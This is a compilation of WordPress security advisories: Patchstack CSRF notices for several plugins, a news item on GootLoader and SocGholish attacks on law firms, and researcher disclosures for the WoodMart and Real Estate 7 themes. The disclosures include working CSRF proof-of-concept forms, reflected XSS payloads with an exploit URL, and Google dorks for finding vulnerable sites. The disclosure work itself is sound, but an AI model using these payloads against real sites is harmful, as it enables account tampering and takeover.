Cross-Site Request Forgery (CSRF) vulnerability in StandaloneTech TeraWallet – For WooCommerce plugin <= 1.3.24 leading to plugin settings change.

**Solution**

Update the WordPress TeraWallet – For WooCommerce plugin to the latest available version (at least 1.4.0).

Muhammad Daffa discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress TeraWallet – For WooCommerce Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 1.4.0.

**2 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-40198: WordPress TeraWallet – For WooCommerce plugin <= 1.3.24 - Cross Site Request Forgery (CSRF) - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Imagely WordPress Gallery Plugin – NextGEN Gallery plugin <= 3.28 leading to thumbnail alteration.

**Solution**

Update the WordPress NextGEN Gallery plugin to the latest available version (at least 3.29).

Lana Codes discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress NextGEN Gallery Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 3.29.

**21 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-38468: WordPress WordPress Gallery Plugin – NextGEN Gallery plugin <= 3.28 - Cross-Site Request Forgery (CSRF) - Patchstack

Six different law firms were targeted in January and February 2023 as part of two disparate threat campaigns distributing GootLoader and FakeUpdates (aka SocGholish) malware strains.
GootLoader, active since late 2020, is a first-stage downloader that's capable of delivering a wide range of secondary payloads such as Cobalt Strike and ransomware.
It notably employs search engine optimization (

Threat Intelligence / Malware

Six different law firms were targeted in January and February 2023 as part of two disparate threat campaigns distributing **GootLoader** and **FakeUpdates** (aka SocGholish) malware strains.

GootLoader, active since late 2020, is a first-stage downloader that's capable of delivering a wide range of secondary payloads such as Cobalt Strike and ransomware.

It notably employs search engine optimization (SEO) poisoning to funnel victims searching for business-related documents toward drive-by download sites that drop the JavaScript malware.

In the campaign detailed by cybersecurity company eSentire, the threat actors are said to have compromised legitimate, but vulnerable, WordPress websites and added new blog posts without the owners' knowledge.

"When the computer user navigates to one of these malicious web pages and hits the link to download the purported business agreement, they are unknowingly downloading GootLoader," eSentire researcher Keegan Keplinger said in January 2022.

The disclosure from eSentire is the latest in a wave of attacks that have utilized the Gootkit malware loader to breach targets.

GootLoader is far from the only JavaScript malware targeting business professionals and law firm employees. A separate set of attacks have also entailed the use of SocGholish, which is a downloader capable of dropping more executables.

The infection chain is further significant for taking advantage of a website frequented by legal firms as a watering hole to distribute the malware.

Another standout aspect of the twin intrusion sets in the absence of ransomware deployment, instead favoring hands-on activity, suggesting that the attacks could have diversified in scope to include espionage operations.

"Prior to 2021, email was the primary infection vector used by opportunistic threat actors," Keplinger said. From 2021 to 2023, browser-based attacks \[...\] have steadily been growing to compete with email as the primary infection vector."

"This has been largely thanks to GootLoader, SocGholish, SolarMarker, and recent campaigns leveraging Google Ads to float top search results."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cybercriminals Targeting Law Firms with GootLoader and FakeUpdates Malware

Cross-Site Request Forgery (CSRF) vulnerability in a3rev Software Contact Us Page – Contact People plugin <= 3.7.0.

**Solution**

Update the WordPress Contact Us page - Contact people LITE plugin to the latest available version (at least 3.7.1).

Rio Darmawan discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Contact Us page - Contact people LITE Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 3.7.1.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-23973: WordPress Contact Us Page – Contact People plugin <= 3.7.0 - Cross Site Request Forgery (CSRF) Leading To Contact Creation Vulnerability - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Wow-Company Bubble Menu – circle floating menu plugin <= 3.0.1 leading to form deletion.

**Solution**

Update the WordPress Bubble Menu – circle floating menu plugin to the latest available version (at least 3.0.2).

Rio Darmawan discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Bubble Menu – circle floating menu Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 3.0.2.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-23984: WordPress Bubble Menu – circle floating menu plugin <= 3.0.1 - Cross Site Request Forgery (CSRF) - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Fullworks Quick Event Manager plugin <= 9.7.4 affecting all registration actions (delete, delete all, edit, update).

**Solution**

Update the WordPress Quick Event Manager plugin to the latest available version (at least 9.7.5).

yuyudhn discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Quick Event Manager Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 9.7.5.

**6 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-23974: WordPress Quick Event Manager plugin <= 9.7.4 - Cross Site Request Forgery (CSRF) - Patchstack

WordPress WoodMart Theme versions 7.1.1 and below suffer from a cross site request forgery vulnerability due to missing nonce validation on the process_form function.

    ==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] ==Report Title:        WordPress WoodMart Theme <= 7.1.1 - Theme License Options Change via CSRFGoogle Dork:         inurl:/wp-content/themes/woodmart/Research Date:       2023-02-10Researcher:          FearZzZz [ https://fearzzzz.ru ]Component Vendor:    XTemos [ https://themeforest.net/user/xtemos ]Vulnerable Version:  <= 7.1.1Component Link:      https://themeforest.net/item/woodmart-woocommerce-wordpress-theme/20264492CVSS Base Score:     5.4 (Medium)CVSS Vector String:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:LOWASP Top 10:        A01: 2021 – Broken Access ControlCWE:                 CWE-352CVE:                 TBA=================================================================================================#### [ Description: ]The WoodMart theme for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, v7.1.1, because of missing nonce validation on the 'process_form' function. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication.#### [ Vulnerable Code: ]File #0: ~/woodmart/inc/classes/License.php, lines: 134-143.```if ( isset( $_POST['purchase-code-deactivate'] ) ) {  $this->deactivate();  $this->_notices->add_success( 'Theme license is successfully deactivated.' );  return;}if ( isset( $_POST['woodmart-purchase-code'] ) && ( ! isset( $_POST['agree_stored'] ) || empty( $_POST['agree_stored'] ) ) ) {  $this->_notices->add_error( 'You must agree to store your purchase code and user data by xtemos.com' );  return;}```#### [ Impact: ]Impact of a CSRF vulnerability is related to the privileges of the target user. Depending on the nature of the action, an attacker might be able to change some data or gain full control over the user's account. If the compromised user has a privileged role (administrator, i.e.) within the application, then the attacker can gain full control over the application.#### [ Proof-of-Concept: ]```<html>  <body>  <script>history.pushState('', '', '/')</script>    <form action="https://fearzzzz.ru/wp-admin/admin.php?page=xts_dashboard&tab=wizard&step=activation" method="POST">      <input type="hidden" name="purchase-code" value="Z" />      <input type="hidden" name="agree_stored" value="on" />      <input type="hidden" name="woodmart-purchase-code" value="Activate theme" />      <input type="submit" value="Submit request" />    </form>  </body></html>``````<html>  <body>  <script>history.pushState('', '', '/')</script>    <form action="https://fearzzzz.ru/wp-admin/admin.php?page=xts_license" method="POST">      <input type="hidden" name="purchase-code" value="Z" />      <input type="hidden" name="agree_stored" value="on" />      <input type="hidden" name="woodmart-purchase-code" value="Activate theme" />      <input type="submit" value="Submit request" />    </form>  </body></html>``````<html>  <body>  <script>history.pushState('', '', '/')</script>    <form action="https://fearzzzz.ru/wp-admin/admin.php?page=xts_license" method="POST">      <input type="hidden" name="purchase-code-deactivate" value="1" />      <input type="submit" value="Submit request" />    </form>  </body></html>```#### [ Timeline: ]2023.02.10 - Vulnerability has been discovered.2023.02.13 - WoodMart Theme v7.1.0 released.2023.02.14 - WoodMart Theme v7.1.1 released.2023.02.14 - Vendor notified, received a quick response.2023.02.14 - All the details was addressed to Envato and Patchstack. CVE ID requested.2023.02.15 - WoodMart Theme v7.1.2 released, the vulnerability has been fixed.#### [ Contacts: ]Website:   fearzzzz.ruEmail:     fearzzzz@tutanota.comTwitter:   https://twitter.com/fear_zzzzMedium:    https://fearzzzz.medium.comGitHub:    https://github.com/fearzzzzYouTube:   https://youtube.com/@fearzzzz#### [ Notes: ]Special thanks to Mikhail Kobzarev (https://t.me/mihdan | https://wp-digest.com) for providing the original theme files.Additional greetings to Kailoon (ThemeForest Senior Reviewer, https://kailoon.com) and XTemos Studio (https://themeforest.net/user/xtemos) for the prompt response.#### [ Disclaimer: ]The information provided in this report is provided "as is" without warranty of any kind. FearZzZz disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall FearZzZz be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if FearZzZz have been advised of the possibility of such damages.========================================================================== [ www.fearzzzz.ru ] ==

WordPress WoodMart Theme 7.1.1 Cross Site Request Forgery

WordPress Real Estate 7 Theme versions 3.3.4 and below suffer from a cross site scripting vulnerability.

    ==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] ==Report Title:        WordPress Real Estate 7 Theme <= 3.3.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)Google Dork:         inurl:/wp-content/themes/realestate-7/Research Date:       2023-02-10Researcher:          FearZzZz [ https://fearzzzz.ru ]Component Vendor:    Contempo Themes [ https://contempothemes.com ]Vulnerable Version:  <= 3.3.4Component Link:      https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778CVSS Base Score:     6.1 (Medium)CVSS Vector String:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NOWASP Top 10:        A7: Cross-Site Scripting (XSS)CWE:                 CWE-79CVE:                 TBA=================================================================================================#### [ Description: ]The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.#### [ Impact: ]Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.#### [ Payloads: ]```<img src=x onerror=(alert)(`FearZzZz`);>``````<svg/onload=alert(`FearZzZz`)>```#### [ Proof-of-Concept: ]https://elementor3.contempothemes.com/?ct_mobile_keyword&ct_keyword=Z&ct_zipcode&search-listings=true&ct_additional_features%5B0%5D=central-forced-air%3Csvg%2Fonload%3Dalert%28%60FearZzZz%60%29%3EGET /?ct_mobile_keyword&ct_keyword=Z&ct_zipcode&search-listings=true&ct_additional_features%5B0%5D=central-forced-air%3Csvg%2Fonload%3Dalert%28%60FearZzZz%60%29%3E HTTP/2Host: elementor3.contempothemes.com#### [ Timeline: ]2023.02.08 - Real Estate 7 Theme v3.3.4 released.2023.02.10 - Vulnerability has been discovered.2023.02.13 - Vendor notified, received a quick response.2023.02.13 - Real Estate 7 Theme v3.3.5 released, the vulnerability has been fixed.#### [ Contacts: ]Website:   fearzzzz.ruEmail:     fearzzzz@tutanota.comTwitter:   https://twitter.com/fear_zzzzMedium:    https://fearzzzz.medium.comGitHub:    https://github.com/fearzzzzYouTube:   https://youtube.com/@fearzzzz#### [ Notes: ]Special thanks to Chris Robinson (Contempo Themes Founder & CEO) for the quick response and for the respectful communication.#### [ Disclaimer: ]The information provided in this report is provided "as is" without warranty of any kind. FearZzZz disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall FearZzZz be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if FearZzZz have been advised of the possibility of such damages.========================================================================== [ www.fearzzzz.ru ] ==

WordPress Real Estate 7 Theme 3.3.4 Cross Site Scripting

WordPress Real Estate 7 Theme versions 3.3.4 and below suffer from multiple cross site request forgery vulnerabilities.

==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] ==

Report Title:        WordPress Real Estate 7 Theme <= 3.3.4 - Multiple Cross-Site Request Forgery (CSRF) Vulnerabilities  
Google Dork:         inurl:/wp-content/themes/realestate-7/  
Research Date:       2023-02-10  
Researcher:          FearZzZz [ https://fearzzzz.ru ]  
Component Vendor:    Contempo Themes [ https://contempothemes.com ]  
Vulnerable Version:  <= 3.3.4  
Component Link:      https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778  
CVSS Base Score:     6.3 (Medium)  
CVSS Vector String:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L  
OWASP Top 10:        A01: 2021 – Broken Access Control  
CWE:                 CWE-352  
CVE:                 TBA

=================================================================================================

#### [ Description: ]

The Real Estate 7 theme for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, v3.3.4, because of missing and incorrect nonce validation on several functions. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication.

#### [ Impact: ]

Impact of a CSRF vulnerability is related to the privileges of the target user. Depending on the nature of the action, an attacker might be able to change some data or gain full control over the user's account. If the compromised user has a privileged role (administrator, i.e.) within the application, then the attacker can gain full control over the application.

#### [ Proof-of-Concept | Lead Alert Creation: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST">  
      <input type="hidden" name="action" value="ct_email_cron_onoff" />  
      <input type="hidden" name="esetting" value="onsms" />  
      <input type="hidden" name="id" value="12" />  
      <input type="hidden" name="author_id" value="22" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Add Property to Favorites: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/our-properties/our-exclusive-listings/">  
      <input type="hidden" name="wpfpaction" value="add" />  
      <input type="hidden" name="postid" value="1005" />  
      <input type="hidden" name="ajax" value="1" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Remove Property from Favorites: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/favorite-listings/">  
      <input type="hidden" name="wpfpaction" value="remove" />  
      <input type="hidden" name="page" value="1" />  
      <input type="hidden" name="postid" value="451" />  
      <input type="hidden" name="ajax" value="1" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Contact / Information Request: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/wp-content/themes/realestate-7/includes/ajax-submit-favorites.php" method="POST">  
      <input type="hidden" name="ctsubject" value="Fear is Big Business" />  
      <input type="hidden" name="name" value="FearZzZz" />  
      <input type="hidden" name="email" value="fearzzzz@tutanota.com" />  
      <input type="hidden" name="ctphone" value="no" />  
      <input type="hidden" name="message" value="Fear is Big Business" />  
      <input type="hidden" name="ctyouremail" value="fearzzzz@tutanota.com" />  
      <input type="hidden" name="ctproperty" value="https://fearzzzz.ru" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/wp-content/themes/realestate-7/includes/ajax-submit-listings.php" method="POST">  
      <input type="hidden" name="listing_id" value="451" />  
      <input type="hidden" name="ctsubject" value="Fear is Big Business" />  
      <input type="hidden" name="name" value="FearZzZz" />  
      <input type="hidden" name="email" value="fearzzzz@tutanota.com" />  
      <input type="hidden" name="ctphone" value="" />  
      <input type="hidden" name="message" value="Fear is Big Business" />  
      <input type="hidden" name="ctyouremail" value="fearzzzz@tutanota.com" />  
      <input type="hidden" name="ctproperty" value="Z" />  
      <input type="hidden" name="ctlistingstreet" value="Z" />  
      <input type="hidden" name="ctlistingcity" value="Z" />  
      <input type="hidden" name="ctlistingstate" value="Z" />  
      <input type="hidden" name="ctlistingzip" value="Z" />  
      <input type="hidden" name="ctpermalink" value="https://fearzzzz.ru" />  
      <input type="hidden" name="ctlistingprice" value="Z" />  
      <input type="hidden" name="ctlistingsqft" value="Z" />  
      <input type="hidden" name="ctlistingbeds" value="" />  
      <input type="hidden" name="ctlistingbaths" value="" />  
      <input type="hidden" name="ctlistinglotsize" value="" />  
      <input type="hidden" name="ctlistingmlsnumber" value="" />  
      <input type="hidden" name="ctlistingpropertytype" value="Detached" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Lead Alert Deletion: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST">  
      <input type="hidden" name="action" value="ct_delete_search" />  
      <input type="hidden" name="property_id" value="12" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Profile Image Deletion: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST">  
      <input type="hidden" name="action" value="ct_ajax_delete_profile_img" />  
      <input type="hidden" name="id" value="1" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Broker Logo Deletion: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST">  
      <input type="hidden" name="action" value="ct_ajax_delete_broker_logo" />  
      <input type="hidden" name="id" value="1" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Clear All Favorites: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/favorite-listings/">  
      <input type="hidden" name="wpfpaction" value="clear" />  
      <input type="hidden" name="ajax" value="1" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Buyer Profile Update: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/account-settings/" method="POST" enctype="multipart/form-data">  
      <input type="hidden" name="first_name" value="" />  
      <input type="hidden" name="last_name" value="" />  
      <input type="hidden" name="nickname" value="fearzzzz" />  
      <input type="hidden" name="display_name" value="FearZzZz" />  
      <input type="hidden" name="email" value="fearzzzz@tutanota.com" />  
      <input type="hidden" name="user_url" value="" />  
      <input type="hidden" name="description" value="" />  
      <input type="hidden" name="pass1" value="" />  
      <input type="hidden" name="pass2" value="" />  
      <input type="hidden" name="twitterhandle" value="" />  
      <input type="hidden" name="facebookurl" value="" />  
      <input type="hidden" name="instagramurl" value="" />  
      <input type="hidden" name="linkedinurl" value="" />  
      <input type="hidden" name="youtubeurl" value="" />  
      <input type="hidden" name="mobile" value="" />  
      <input type="hidden" name="user_additional_phone_1" value="" />  
      <input type="hidden" name="user_additional_phone_2" value="" />  
      <input type="hidden" name="user_mailing_address" value="" />  
      <input type="hidden" name="updateuser" value="Update Profile" />  
      <input type="hidden" name="_wpnonce" value="0451" />  
      <input type="hidden" name="_wp_http_referer" value="/account-settings/" />  
      <input type="hidden" name="action" value="update-user" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Agent Profile Update: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <script>  
      function submitRequest()  
      {  
        var xhr = new XMLHttpRequest();  
        xhr.open("POST", "https:\/\/fearzzzz.ru\/account-settings\/", true);  
        xhr.setRequestHeader("content-type", "multipart\/form-data; boundary=---------------------------333499251812319952534005853646");  
        xhr.withCredentials = true;  
        var body = "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"first_name\"\r\n" +   
          "\r\n" +   
          "Agent\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"last_name\"\r\n" +   
          "\r\n" +   
          "Demo\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"nickname\"\r\n" +   
          "\r\n" +   
          "agent\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"display_name\"\r\n" +   
          "\r\n" +   
          "Demo Agent\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"email\"\r\n" +   
          "\r\n" +   
          "agent@email.com\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"user_url\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"description\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"pass1\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"pass2\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"twitterhandle\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"facebookurl\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"instagramurl\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"linkedinurl\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"youtubeurl\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +   
          "\r\n" +   
          "1024000\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"ct_profile_img\"; filename=\"fearzzzz.jpg\"\r\n" +   
          "Content-Type: image/jpeg\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"mobile\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"user_additional_phone_1\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"user_additional_phone_2\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"user_mailing_address\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"fax\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"title\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"tagline\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"agentlicense\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +   
          "\r\n" +   
          "1024000\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"ct_broker_logo\"; filename=\"fearzzzz.jpg\"\r\n" +   
          "Content-Type: image/jpeg\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"brokeragename\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"brokeragelicense\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"office\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"address\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"city\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"state\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"postalcode\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"updateuser\"\r\n" +   
          "\r\n" +   
          "Update Profile\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"_wpnonce\"\r\n" +   
          "\r\n" +   
          "0451\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n" +   
          "\r\n" +   
          "/account-settings/\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"action\"\r\n" +   
          "\r\n" +   
          "update-user\r\n" +   
          "-----------------------------333499251812319952534005853646--\r\n";  
        var aBody = new Uint8Array(body.length);  
        for (var i = 0; i < aBody.length; i++)  
          aBody[i] = body.charCodeAt(i);   
        xhr.send(new Blob([aBody]));  
      }  
    </script>  
    <form action="#">  
      <input type="button" value="Submit request" onclick="submitRequest();" />  
    </form>  
  </body>  
</html>  
```

#### [ Timeline: ]

2023.02.08 - Real Estate 7 Theme v3.3.4 released.  
2023.02.10 - Vulnerability has been discovered.  
2023.02.15 - Vendor notified.  
2023.02.16 - Chris Robinson responded that the vulnerabilities have been fixed. The release of the new version v3.3.5 is scheduled for March 6.

#### [ Contacts: ]

Website:   fearzzzz.ru  
Email:     fearzzzz@tutanota.com  
Twitter:   https://twitter.com/fear_zzzz  
Medium:    https://fearzzzz.medium.com  
GitHub:    https://github.com/fearzzzz  
YouTube:   https://youtube.com/@fearzzzz

#### [ Notes: ]

Special thanks to Chris Robinson (Contempo Themes Founder & CEO) for the quick response and for the respectful communication.

#### [ Disclaimer: ]

The information provided in this report is provided "as is" without warranty of any kind. FearZzZz disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall FearZzZz be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if FearZzZz have been advised of the possibility of such damages.

========================================================================== [ www.fearzzzz.ru ] ==

WordPress Real Estate 7 Theme 3.3.4 Cross Site Request Forgery

Cross-Site Request Forgery (CSRF) vulnerability in Checkout Plugins Stripe Payments For WooCommerce plugin <= 1.4.10 leads to settings change.

**Solution**

Update the WordPress Stripe Payments For WooCommerce by Checkout plugin to the latest available version (at least 1.4.11).

Lana Codes discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Stripe Payments For WooCommerce by Checkout Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 1.4.11.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-23865: WordPress Stripe Payments For WooCommerce by Checkout Plugins plugin <= 1.4.10 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Tag

#wordpress